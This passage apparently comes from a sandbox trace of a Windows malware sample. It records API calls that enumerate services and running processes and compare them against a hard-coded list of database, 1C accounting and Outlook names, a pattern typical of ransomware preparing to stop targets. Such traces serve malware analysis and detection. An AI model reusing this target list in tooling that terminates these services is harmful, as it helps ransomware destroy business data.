out: lpServices=0x57d8c0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0274.289] CloseServiceHandle (hSCObject=0x43c09d0) returned 1 [0274.289] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0274.289] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0274.289] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0274.289] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0274.289] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0274.289] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0274.289] lstrlenW (lpString="AudioSrv") returned 8 [0274.289] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0274.289] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0274.289] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0274.289] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0274.289] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0274.289] lstrlenW (lpString="BFE") returned 3 [0274.289] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0274.289] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0274.289] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0274.289] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0274.289] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0274.289] lstrlenW (lpString="CryptSvc") returned 8 [0274.289] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0274.290] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0274.290] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0274.290] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0274.290] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0274.290] lstrlenW (lpString="CscService") returned 10 [0274.290] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0274.290] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0274.290] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0274.290] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0274.290] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0274.290] lstrlenW (lpString="DcomLaunch") returned 10 [0274.290] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0274.290] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0274.290] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0274.290] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0274.290] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0274.290] lstrlenW (lpString="Dhcp") returned 4 [0274.290] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0274.290] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0274.290] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0274.290] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0274.290] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0274.290] lstrlenW (lpString="Dnscache") returned 8 [0274.290] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0274.290] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0274.290] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0274.290] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0274.290] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0274.291] lstrlenW (lpString="DPS") returned 3 [0274.291] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0274.291] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0274.291] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0274.291] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0274.291] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0274.291] lstrlenW (lpString="eventlog") returned 8 [0274.291] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0274.291] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0274.291] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0274.291] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0274.291] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0274.291] lstrlenW (lpString="EventSystem") returned 11 [0274.291] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0274.291] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0274.291] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0274.291] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0274.291] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0274.291] lstrlenW (lpString="gpsvc") returned 5 [0274.291] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0274.291] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0274.291] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0274.291] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0274.291] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0274.291] lstrlenW (lpString="LanmanWorkstation") returned 17 [0274.291] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0274.291] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0274.291] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0274.291] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0274.291] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0274.292] lstrlenW (lpString="lmhosts") returned 7 [0274.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0274.292] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0274.292] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0274.292] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0274.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0274.292] lstrlenW (lpString="MMCSS") returned 5 [0274.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0274.292] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0274.292] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0274.292] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0274.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0274.292] lstrlenW (lpString="MpsSvc") returned 6 [0274.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0274.292] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0274.292] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0274.292] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0274.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0274.292] lstrlenW (lpString="NlaSvc") returned 6 [0274.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0274.292] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0274.292] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0274.292] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0274.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0274.292] lstrlenW (lpString="nsi") returned 3 [0274.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0274.292] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0274.292] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0274.292] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0274.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0274.292] lstrlenW (lpString="PcaSvc") returned 6 [0274.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0274.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0274.293] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0274.293] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0274.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0274.293] lstrlenW (lpString="PlugPlay") returned 8 [0274.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0274.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0274.293] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0274.293] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0274.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0274.293] lstrlenW (lpString="Power") returned 5 [0274.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0274.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0274.293] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0274.293] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0274.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0274.293] lstrlenW (lpString="ProfSvc") returned 7 [0274.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0274.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0274.293] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0274.293] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0274.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0274.293] lstrlenW (lpString="RpcEptMapper") returned 12 [0274.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0274.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0274.293] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0274.293] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0274.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0274.293] lstrlenW (lpString="RpcSs") returned 5 [0274.294] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0274.294] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0274.294] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0274.294] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0274.294] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0274.294] lstrlenW (lpString="SamSs") returned 5 [0274.294] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0274.294] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0274.294] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0274.294] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0274.294] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0274.294] lstrlenW (lpString="Schedule") returned 8 [0274.294] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0274.294] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0274.294] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0274.294] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0274.294] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0274.294] lstrlenW (lpString="SENS") returned 4 [0274.294] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0274.294] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0274.294] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0274.294] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0274.294] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0274.294] lstrlenW (lpString="ShellHWDetection") returned 16 [0274.294] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0274.294] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0274.294] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0274.294] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0274.294] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0274.295] lstrlenW (lpString="Spooler") returned 7 [0274.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0274.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0274.295] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0274.295] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0274.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0274.295] lstrlenW (lpString="Themes") returned 6 [0274.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0274.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0274.295] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0274.295] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0274.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0274.295] lstrlenW (lpString="UxSms") returned 5 [0274.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0274.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0274.295] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0274.295] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0274.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0274.295] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x57d8c0 | out: hHeap=0x520000) returned 1 [0274.295] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3c0 [0274.296] Process32FirstW (in: hSnapshot=0x3c0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.296] Process32NextW (in: hSnapshot=0x3c0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0274.296] lstrlenW (lpString="System") returned 6 [0274.296] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0274.296] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0274.296] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0274.296] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0274.296] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0274.297] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0274.297] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0274.297] Process32NextW (in: hSnapshot=0x3c0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0274.297] lstrlenW (lpString="smss.exe") returned 8 [0274.297] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0274.297] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0274.297] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0274.297] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0274.297] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0274.297] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0274.297] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0274.297] Process32NextW (in: hSnapshot=0x3c0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0274.297] lstrlenW (lpString="csrss.exe") returned 9 [0274.297] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0274.297] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0274.297] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0274.297] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0274.297] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0274.297] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0274.298] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0274.298] Process32NextW (in: hSnapshot=0x3c0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0274.298] lstrlenW (lpString="wininit.exe") returned 11 [0274.298] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0274.298] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0274.298] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0274.298] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0274.298] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0274.298] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0274.298] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0274.298] Process32NextW (in: hSnapshot=0x3c0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0274.298] lstrlenW (lpString="csrss.exe") returned 9 [0274.298] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0274.298] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0274.298] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0274.298] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0274.298] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0274.299] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0274.299] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0274.299] Process32NextW (in: hSnapshot=0x3c0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0274.299] lstrlenW (lpString="winlogon.exe") returned 12 [0274.299] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0274.299] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0274.299] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0274.299] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0274.299] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0274.299] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0274.299] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0274.299] Process32NextW (in: hSnapshot=0x3c0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0274.299] lstrlenW (lpString="services.exe") returned 12 [0274.299] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0274.299] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0274.299] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0274.299] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0274.299] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0274.299] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0274.299] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0274.300] Process32NextW (in: hSnapshot=0x3c0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0274.300] lstrlenW (lpString="lsass.exe") returned 9 [0274.300] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0274.300] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0274.300] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0274.300] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0274.300] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0274.300] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0274.300] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0274.300] Process32NextW (in: hSnapshot=0x3c0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0274.300] lstrlenW (lpString="lsm.exe") returned 7 [0274.300] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0274.300] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0274.300] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0274.300] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0274.300] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0274.300] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0274.300] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0274.300] Process32NextW (in: hSnapshot=0x3c0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.301] lstrlenW (lpString="svchost.exe") returned 11 [0274.301] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0274.301] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0274.301] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0274.301] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0274.301] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0274.301] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0274.301] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0274.301] Process32NextW (in: hSnapshot=0x3c0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.301] lstrlenW (lpString="svchost.exe") returned 11 [0274.301] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0274.301] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0274.301] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0274.301] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0274.301] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0274.301] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0274.301] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0274.301] Process32NextW (in: hSnapshot=0x3c0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.302] lstrlenW (lpString="svchost.exe") returned 11 [0274.302] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0274.302] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0274.302] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0274.302] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0274.302] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0274.302] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0274.302] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0274.302] Process32NextW (in: hSnapshot=0x3c0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, 